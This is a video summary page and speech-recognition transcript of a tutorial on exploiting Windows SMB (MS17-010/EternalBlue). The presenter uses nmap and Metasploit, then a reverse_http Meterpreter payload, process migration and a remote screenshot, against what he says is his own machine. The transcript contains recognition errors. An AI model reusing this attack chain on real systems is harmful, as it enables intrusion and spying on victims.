Metasploit For Beginners - How To Scan And Pwn A Computer | Learn From A Pro Hacker

Loi Liang Yang
15 Apr 202110:02

Summary

TLDRThis episode of 'Hub Hack' demonstrates how to identify vulnerabilities in computer systems for unauthorized access. The tutorial covers using nmap to scan for open services, Metasploit for finding exploits, and exploiting SMB vulnerabilities like 'Eternal Blue' to gain control of a Windows system. It concludes with a warning about the importance of securing services to prevent such breaches, encouraging viewers to stay vigilant about cybersecurity.

Takeaways

  • πŸ˜€ The video is an educational tutorial on hacking techniques to find vulnerabilities in computer systems.
  • πŸ” It teaches how to use nmap to scan a computer system for running services and look for vulnerabilities.
  • πŸ’» The presenter demonstrates the process on a Windows 10 computer by checking the IP address with 'ipconfig'.
  • πŸš€ The tutorial covers how to use nmap to identify open ports and services, such as SMB, which can be exploited.
  • πŸ”‘ It explains the importance of identifying the version of services to find specific exploits.
  • πŸ•΅οΈβ€β™‚οΈ Metasploit is introduced as the exploitation framework used to check for vulnerabilities and launch attacks.
  • πŸ”Ž The video shows how to search for SMB-related modules in Metasploit to find potential exploits.
  • πŸ”„ The use of 'auxiliary scanner' in Metasploit is demonstrated to check if the system is vulnerable to SMB attacks.
  • πŸ’‘ The script references the infamous 'Eternal Blue' exploit, associated with the WannaCry ransomware attack.
  • πŸ€– The tutorial guides through setting up an exploit in Metasploit, including setting the target IP and payload.
  • πŸ–ΌοΈ After gaining access, the video shows how to migrate the shell to a different process to capture the screen of the compromised system.
  • πŸ›‘οΈ The presenter emphasizes the importance of being cautious with the services running on one's computer system for security.

Q & A

  • What is the main topic of the video script?

    -The main topic of the video script is about finding vulnerabilities in computer systems to gain unauthorized access and control over the entire system.

  • What tool is used to scan a computer system for services and vulnerabilities?

    -The tool used to scan a computer system for services and vulnerabilities is Nmap.

  • What is the purpose of the 'nmap -sV' command?

    -The 'nmap -sV' command is used to determine the version of the services running on the open ports of a scanned host.

  • What is SMB and why is it significant in the context of the video?

    -SMB stands for Server Message Block, a protocol that allows file and printer sharing across computers. It is significant because the script discusses exploiting vulnerabilities in SMB services to gain access to a computer system.

  • What is Metasploit and how does it relate to the video script?

    -Metasploit is an exploitation framework used to identify, exploit, and validate vulnerabilities. In the video script, it is used to check if the computer system is vulnerable to certain types of attacks.

  • What is the 'ms17010' vulnerability mentioned in the script?

    -The 'ms17010' vulnerability, also known as 'EternalBlue', is a critical SMB vulnerability that was exploited in widespread ransomware attacks. It allows remote code execution on affected systems.

  • What does the script suggest doing after finding the version of services with Nmap?

    -After finding the version of services with Nmap, the script suggests using Metasploit to check if the computer system is vulnerable to attacks specific to those service versions.

  • What payload is used in the script to exploit the 'ms17010' vulnerability?

    -The script uses 'windows/meterpreter/reverse_http' as the payload to exploit the 'ms17010' vulnerability.

  • What action is taken after a successful exploitation to gain control of the computer system?

    -After a successful exploitation, the script demonstrates migrating the shell to a different process and taking a screen capture of the entire computer system to show that full control has been achieved.

  • What is the final message of the video script regarding computer security?

    -The final message of the video script is a warning to be careful about the services running on computer systems, emphasizing the importance of cybersecurity.

Outlines

00:00

πŸ’» Introduction to Hacking Techniques

This paragraph introduces a tutorial on hacking, specifically how to find vulnerabilities in computer systems to gain unauthorized access. The host demonstrates the use of nmap to scan for open services on a target computer and discusses the importance of identifying weaknesses in these services. The tutorial aims to teach viewers how to find exploits and utilize them to access a computer system, starting with a practical example of scanning a Windows 10 computer for open ports and services.

05:01

πŸ” Scanning and Exploiting SMB Vulnerabilities

The second paragraph delves into the process of scanning for and exploiting SMB (Server Message Block) vulnerabilities, which are commonly found in Windows systems and can be used for file and printer sharing. The host explains how to use nmap to identify the version of SMB services running on a target machine and then introduces Metasploit, an exploitation framework, to search for and utilize SMB-related exploits. The paragraph covers the use of specific Metasploit modules to check for vulnerabilities, such as the infamous 'Eternal Blue' exploit, and demonstrates how to execute an attack to gain control over the target system. The host also shows how to migrate the shell to a different process for further actions, such as taking a screenshot of the target's desktop, emphasizing the seriousness of leaving services vulnerable to such attacks.

Mindmap

Keywords

πŸ’‘Hacking

Hacking refers to the unauthorized access or control over a computer system or network. In the context of the video, hacking is portrayed as the process of finding vulnerabilities in a computer system to gain access and control, which is the central theme of the tutorial.

πŸ’‘Vulnerabilities

Vulnerabilities are weaknesses in a system that can be exploited by hackers to gain unauthorized access. The video discusses finding these vulnerabilities in services running on a computer system, which is a critical step in the hacking process.

πŸ’‘Nmap

Nmap, or Network Mapper, is a security scanner used to discover hosts and services on a computer network, thus creating a 'map' of the system. In the video, Nmap is used to scan for open ports and services on a target computer, which helps identify potential vulnerabilities.

πŸ’‘Services

In the context of computer networks, services refer to the specific processes or functions that a system provides, often over a network. The video script mentions scanning for services to find potential weaknesses and exploits, such as SMB (Server Message Block).

πŸ’‘SMB (Server Message Block)

SMB is a network file sharing protocol that allows applications to read and write to files and to request services from server programs. The video explains that SMB is a common service on Windows computers and is associated with certain vulnerabilities that can be exploited.

πŸ’‘Exploits

An exploit is a piece of software, a chunk of data, or a sequence of commands that takes advantage of a bug or vulnerability in order to cause unintended or undesired behavior in a computer system. The video discusses finding and utilizing exploits to gain access to a computer system.

πŸ’‘Metasploit

Metasploit is an open-source penetration testing platform that helps find, verify, and validate vulnerabilities. The video script describes using Metasploit to search for and launch attacks against vulnerabilities in the target system.

πŸ’‘Payload

In the context of hacking, a payload is the data or commands that are executed when an exploit is successful. The video script mentions setting a payload, such as 'windows/meterpreter/reverse_http', to establish a connection back to the attacker's system after a successful exploit.

πŸ’‘MS17010

MS17010 refers to a specific vulnerability in the SMB protocol that was exploited by the WannaCry ransomware attack in 2017. The video script uses this as an example of a vulnerability that can be scanned for and exploited using Metasploit.

πŸ’‘Eternal Blue

Eternal Blue is the name of a Windows exploit that was leaked by the Shadow Brokers, targeting the SMB protocol. The video script mentions using an exploit named 'Eternal Blue' to demonstrate how to attack a vulnerable system.

πŸ’‘Meterpreter

Meterpreter is a powerful payload type used in Metasploit that provides a feature-rich shell within the exploited system. The video script refers to using a Meterpreter payload to gain a reverse HTTP connection, allowing the attacker to interact with the compromised system.

Highlights

Introduction to finding system vulnerabilities for unauthorized access.

Teaching how to scan a computer system for running services and vulnerabilities.

Using nmap to scan a computer for available services and potential exploits.

Demonstration of nmap scanning on a Windows 10 computer.

Explanation of how to bypass firewalls during nmap scanning.

Identification of open ports and services such as SMB.

SMB (Server Message Block) explained for file and printer sharing.

Finding the version of services to identify specific vulnerabilities.

Launching Metasploit for further exploitation of the system.

Searching for SMB-related modules in Metasploit.

Utilizing auxiliary scanners to check for SMB vulnerabilities.

The significance of the SMB MS17010 vulnerability in past ransomware attacks.

How to use Metasploit to check for specific SMB vulnerabilities.

Selecting and configuring an exploit for the SMB MS17010 vulnerability.

Executing the exploit to gain access to the target computer system.

Demonstration of migrating the shell to a different process for further actions.

Capturing and saving a screenshot of the target's desktop.

Emphasizing the importance of securing services running on computer systems.

Conclusion and call to action for feedback, likes, shares, and subscriptions.

Transcripts

play00:00

hi and welcome back to another episode

play00:01

on hub hack and today i'll be teaching

play00:03

you

play00:03

about how you can find holes in a

play00:05

computer system that can give you

play00:07

access and take over the entire computer

play00:10

completely

play00:10

don't believe me let's go

play00:18

[Music]

play00:24

so in a session today what we'll be

play00:25

learning is how we can scan a computer

play00:27

system

play00:28

for different kind of services they're

play00:29

running and are looking for

play00:31

vulnerabilities in those systems

play00:32

so looking for weaknesses in those

play00:34

services they can then give us access

play00:36

to find exploits that are available

play00:39

making sure that this computer system is

play00:41

susceptible to those attacks

play00:42

which we can then utilize those exploits

play00:44

to give us access

play00:46

into the computer system i will teach

play00:47

you about how you can do it quickly

play00:49

so right in front of us i have call

play00:50

linux running and i can go ahead and

play00:52

enter terminal

play00:53

all right so i can zoom a little more so

play00:54

it's easier for you to see so the first

play00:56

thing we can do is to go ahead and use

play00:58

nmap to scan a specific computer

play01:00

so that we can find those services

play01:01

available and then looking

play01:03

for exploits that are in affiliation

play01:06

with those

play01:07

vulnerabilities so that we can exploit

play01:08

it and give us access

play01:10

into the entire computer system so the

play01:12

first thing you can do

play01:13

over here i have a windows 10 computer

play01:15

running and i can go ahead and enter

play01:16

ipconfig

play01:18

and right here as i scroll up further i

play01:20

can see the ipv4 address

play01:22

so in this case our target ip address is

play01:25

192

play01:27

168.0.186 so all i got to do right now

play01:29

is go under nmap

play01:30

and enter 192 168.0.186

play01:34

hit enter on this and we'll begin the

play01:36

scanning using nmap so map is a network

play01:38

mapping service

play01:40

that can help us investigate and probe a

play01:42

computer

play01:43

to check for services check for versions

play01:45

check for different types

play01:47

of accessors that we can perhaps even

play01:49

try to gain access into

play01:50

all right and the first thing you notice

play01:52

here is that the host

play01:53

seems down if it is really up but

play01:55

blocking european purpose try

play01:57

dash pn alright so what is happening

play01:59

here is that

play02:00

there is a windows firewall that is

play02:02

running right which is the result

play02:04

of us being unable to complete a default

play02:06

scan so all you're going to do now is

play02:07

enter

play02:08

dash capital pn hit enter on this and

play02:11

we'll now begin

play02:12

right the scanning and the address will

play02:13

be marked as up

play02:15

and of course the scan time will take a

play02:16

little longer and in this case we can

play02:18

identify the following all right we have

play02:20

one three five as a port number we have

play02:23

one

play02:23

tree nine as net buyers ssn four four

play02:26

five two eight six nine as well as three

play02:30

three eight nine all right so we can see

play02:31

all these different kind of services

play02:32

that are open up

play02:33

so what we can do next is to do an

play02:36

investigation

play02:37

about all the specific ports and what i

play02:39

can tell you for sure

play02:40

is that because you are so familiar with

play02:42

the different types

play02:44

of services because of your background

play02:46

and network administration and system

play02:47

administration

play02:48

you know all right without even further

play02:50

checking that

play02:51

1 39 and 445 are actually services

play02:55

associated with smb right so what is smp

play02:58

smb is server message block so it allows

play03:01

file sharing literally

play03:02

file printer sharing that's being

play03:04

enabled on computers and a lot of

play03:06

computers actually have

play03:07

all right smb running in windows

play03:09

computer particularly

play03:10

as a result that there are protection

play03:12

weaknesses that you can try to exploit

play03:13

to gain access to it

play03:15

so what i can do next is to find out the

play03:16

version of those particular services

play03:19

so you can enter dash s followed by a

play03:21

capital v hit enter on this

play03:23

and it will try to help us find out

play03:24

specific versions in association

play03:27

with those services that are open in a

play03:28

host all right so right here we can try

play03:30

to figure out what is going on in this

play03:33

particular computer all right so we have

play03:34

the following

play03:35

more detailed version of it and we have

play03:37

the host name now all right and we have

play03:39

the windows

play03:40

we have the workgroup information and so

play03:41

on so

play03:43

this gives us a more precise feedback

play03:45

about the kind of services that are

play03:46

actually open up

play03:47

so what i can do next is to go ahead and

play03:49

start a metasploit which is our

play03:51

exploitation framework

play03:52

that would give us access into the

play03:54

entire computer system all right so i'll

play03:55

go ahead and enter sudo

play03:56

msf console hit enter on this and i can

play03:59

enter my password

play04:00

and once i load up my exploit framework

play04:02

we can then check the computer system to

play04:04

see if it's vulnerable to certain type

play04:05

of attacks

play04:06

all right so what i can do now is to go

play04:08

ahead and enter search and then i can

play04:09

enter smb all right so this is

play04:11

exactly what we're looking out for so in

play04:13

this case we have a lot

play04:14

of different kind of modules that we can

play04:16

run to check the computer system

play04:18

all right so we can scroll all the way

play04:19

up and look at all this

play04:21

different methods that we can utilize as

play04:23

part of the hack

play04:24

and we can see over here we have

play04:26

exploits we have auxiliary scanner and

play04:28

so on

play04:28

so what i can so what i can do next is

play04:30

to teach you about how you can actually

play04:32

search more precisely

play04:33

in metasploit so what we can do now is

play04:35

enter grab for by scanner

play04:37

follow by search smb hit enter on this

play04:39

and we just show us

play04:40

all those results that only contain

play04:42

scanner and in this case we can see

play04:44

auxiliary

play04:45

scanner and what we're doing now is to

play04:47

check whether this particular system

play04:49

is vulnerable to smb attacks all right

play04:52

so here we have smb

play04:54

ms-17010 do you remember back in the

play04:57

days

play04:57

when there was a huge outbreak of

play04:59

ransomware attacks so they were

play05:01

utilizing this specific

play05:02

all right scanning method as well as

play05:04

exploitation to gain access

play05:06

into the entire computer system all

play05:07

right so right here what i can do next

play05:09

is go ahead

play05:10

all right and enter use auxiliary

play05:14

scanner smb smb underscore ms17010 hit

play05:19

enter on this

play05:20

and enter show options alright so this

play05:22

will show us all the options that we

play05:23

have to key in

play05:24

as part of checking whether this

play05:26

specific computer can be vulnerable to

play05:28

this attack so all i got to do now

play05:30

is under set our hosts and the ip

play05:32

address that we're targeting

play05:35

192.168.0.1.6. so you may have your own

play05:37

ip address

play05:37

as part of the attack so once you're

play05:39

done right here all you got to do is to

play05:41

go and hit enter run

play05:42

hit enter on this and state the

play05:44

following scary stuff

play05:45

host is likely vulnerable to ms-17010

play05:50

so i'm going to pause here for a moment

play05:51

and what we are trying to do right now

play05:53

so far

play05:53

is to scan the device for services

play05:55

they're running and also to look out for

play05:57

potential vulnerabilities

play05:58

that is associated with those services

play06:00

in the computer okay

play06:02

and next is to find the export available

play06:04

so that we can gain direct access

play06:06

back to the computer giving us full

play06:08

control of the entire computer system

play06:09

okay

play06:10

so what i can do next is to go ahead all

play06:12

right and search

play06:13

for smb okay so we have smb and we can

play06:16

look out for all those

play06:18

modules available with smb and of course

play06:19

what we can do even better

play06:21

is to go ahead and enter graph and now

play06:24

what we are trying to do

play06:25

is to look for exploits so i grab export

play06:27

search smb hit enter on this

play06:29

and we have a number of exploits

play06:30

available for us to use and utilize

play06:33

as part of running the attack all right

play06:34

so all i can see here

play06:36

screw up all the way back to the top

play06:38

right so we have multi http

play06:40

windows smb and so on and what we are

play06:43

trying to find here

play06:45

is an exploit that can help us launch an

play06:47

attack directly against

play06:48

this service exploit windows smb ms17010

play06:53

eternal blue alright or you can also use

play06:56

exploit windows

play06:57

smb ms17010ps exec so i'll go ahead and

play07:01

select this

play07:02

all right enter use followed by exploit

play07:04

paste selection hit enter on this

play07:06

okay and we can enter show options

play07:10

and right here we have the number of

play07:12

options that we need to key in so the

play07:13

main option

play07:14

is our host so go ahead and enter the ip

play07:16

address so this is the target

play07:18

machine that we're going after so enter

play07:19

set our host 182.168.0.1.6 hit enter on

play07:22

this

play07:22

so we have set the our host right now

play07:24

and all we got to do right now is to go

play07:26

ahead

play07:27

and set a particular payload all right

play07:28

so we can enter set

play07:30

payload you can double tap on this and

play07:31

it will show you all the available

play07:33

payloads that you can utilize

play07:34

as part of running the attack okay so in

play07:36

this case what i can do is enter set

play07:38

payload

play07:38

and we can use say for example windows

play07:41

slash and double tap on it and look at

play07:43

all the other possibilities that we can

play07:45

utilize okay

play07:46

so in this case we have multiplier all

play07:48

right so let's try to use interpreter

play07:49

for this case

play07:50

right so we can use windows multiplier

play07:54

double tap on it and see what else we

play07:56

got and we can now use for example

play07:57

reverse

play07:58

underscore http hit enter on this under

play08:00

show options

play08:01

and now we're going to set the l host

play08:03

and l host has already been set for us

play08:04

so that's great

play08:05

fantastic a lot of automation on it so

play08:07

all i got to do now is enter exploit

play08:09

and let's see what happens hit exploit

play08:10

on this and we can see

play08:12

right here right now we have the

play08:13

material session one open

play08:15

which means we are literally in we have

play08:19

hacked

play08:19

into the computer system and we are now

play08:22

full control

play08:22

of the entire computer i can enter

play08:24

system fold hit enter on this and we can

play08:26

see the system information

play08:27

inside the computer right now i can

play08:29

enter help and this will show us

play08:31

all the commands and instructions that

play08:32

we can send directly into the windows

play08:34

computer so what's next is i can migrate

play08:36

this shell that we've got in this

play08:38

multiple shell that we've gotten

play08:39

into a different process in which will

play08:41

then allow us to take a screen capture

play08:43

of the entire computer system

play08:45

so all i'm gonna do now is enter for

play08:46

example okay ps

play08:48

to see all the lists of services inside

play08:50

the computer system

play08:51

all right and this will show us all the

play08:53

processes they're running and i can do

play08:54

enter migrate and we can migrate to say

play08:56

four zero two zero which is on

play08:58

onedrive.exe

play08:59

okay so i go ahead and hit enter on this

play09:01

because it is currently running

play09:03

as a user which is loy leongyan so again

play09:05

i'm hacking myself so don't worry i will

play09:07

not be hacking you

play09:08

go ahead and hit enter on this and now

play09:10

we're migrating the process over

play09:12

and right here okay once we've completed

play09:14

the migration i can enter

play09:15

all right the following i can enter

play09:17

screen all right followed by

play09:19

shot hit enter on this and we will save

play09:21

a copy

play09:22

of the entire desktop screen to the

play09:24

following all right so i can go ahead

play09:25

and open up this file right so i click

play09:27

on the top left corner

play09:29

i open the folder all right and right

play09:31

here i can see the file has been saved

play09:33

and i can double click on it on the

play09:34

following all right we got this

play09:36

particular file that's been saved

play09:37

double clicked on it and right here we

play09:39

can see we're in

play09:40

we have full control of the entire

play09:42

computer system isn't that scary

play09:44

so you got to be really careful about

play09:45

what kind of services you have running

play09:47

inside all your computer systems

play09:49

so once again i hope you learned

play09:50

something valuable in today's tutorial

play09:51

if you have any questions please leave a

play09:52

comment below

play09:53

and i'll try my best to answer any of

play09:54

your questions remember like share and

play09:56

subscribe to channel

play09:57

so that you can become a brand of the

play09:58

latest cybersecurity tutorial thank you

play10:00

so much once again for watching

Browse More Related Video

Simple Penetration Testing Tutorial for Beginners!

Windows Latest CMD Hacks & Tricks

Threat to Infomation system- passive & active attack, accidental & intentional threats | MCA b.tech

Penetration Tests - CompTIA Security+ SY0-701 - 5.5

Arithmetic Overflow and Underflow | Hack Solidity (0.6)

SSRF to Pwned on AWS

Rate This
β˜…
β˜…
β˜…
β˜…
β˜…

5.0 / 5 (0 votes)

Summary
Outlines
Mindmap
Keywords
Highlights
Transcripts
Related Tags
Ethical HackingSystem SecurityVulnerability ScanningNmap TutorialMetasploit FrameworkSMB ExploitsCybersecurity EducationHacking TechniquesNetwork SecurityWindows FirewallExploit Techniques